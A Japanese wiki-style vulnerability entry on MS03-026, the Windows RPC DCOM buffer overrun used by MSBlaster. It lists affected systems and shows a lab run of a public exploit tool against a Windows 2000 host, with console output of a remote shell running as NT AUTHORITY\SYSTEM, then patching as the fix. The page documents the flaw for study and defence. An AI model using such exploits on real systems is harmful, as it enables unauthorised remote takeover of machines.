MS03-026:RPC インターフェイスのバッファ オーバーランによりコードが実行される

• 2006/02/20　「概要」にMSBlasterの説明を追加
  • Author kikuzou
• 2006/02/19　初版
  • Author grin

• RPC インターフェイスの脆弱性に対するExploit
• 2003年夏に炸裂した「MSBlaster」ワームが利用した脆弱性
• このExploitを使用すると、任意のポートでコマンドシェルをオープンし接続を行う

• Microsoft Windows NT Workstation 4.0
• Microsoft® Windows NT® Server 4.0
• Microsoft Windows NT Server 4.0, Terminal Server Edition
• Microsoft Windows® 2000
• Microsoft Windows XP
• Microsoft Windows Server™ 2003

• Microsoft Windows Millennium Edition

• Microsoft::Microsoft Windows のセキュリティ修正プログラム
• CVE-2003-0352

• Windows2000 Advanced Server SP2 日本語版

• 攻撃先IPアドレス: 192.168.0.202（PC名 victim-w2k）
• 攻撃元IPアドレス: 192.168.0.3（OS Windows XP SP1）

• Exploitコードを実行

Dropping dcom.exe and cygwin1.dll...
Executing C:\WINDOWS\dcom.exe...

RPC DCOM remote exploit - .:[oc192.us]:. Security
GUI By r3L4x - DarkSideofKalez.com

[+] Resolving host...
[+] Done.
[o] Target: [Win2k-All] : 192.168.0.202 : 135, Shell : 9151, RET=[0x0018759f]
[+] Connected to Shell...

-- w00t --

Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.

C:\WINNT\system32>whoami
whoami
NT AUTHORITY\SYSTEM

C:\WINNT\system32>hostname
hostname
victim-w2k

C:\WINNT\system32>ipconfig
ipconfig

Windows 2000 IP Configuration

Ethernet adapter ローカル エリア接続:

        Connection-specific DNS Suffix  . :
        IP Address. . . . . . . . . . . . : 192.168.0.202
        Subnet Mask . . . . . . . . . . . : 255.255.255.0
        Default Gateway . . . . . . . . . : 192.168.0.1

C:\WINNT\system32>

1. MS03-026 パッチの適用 (Windows Update の実施)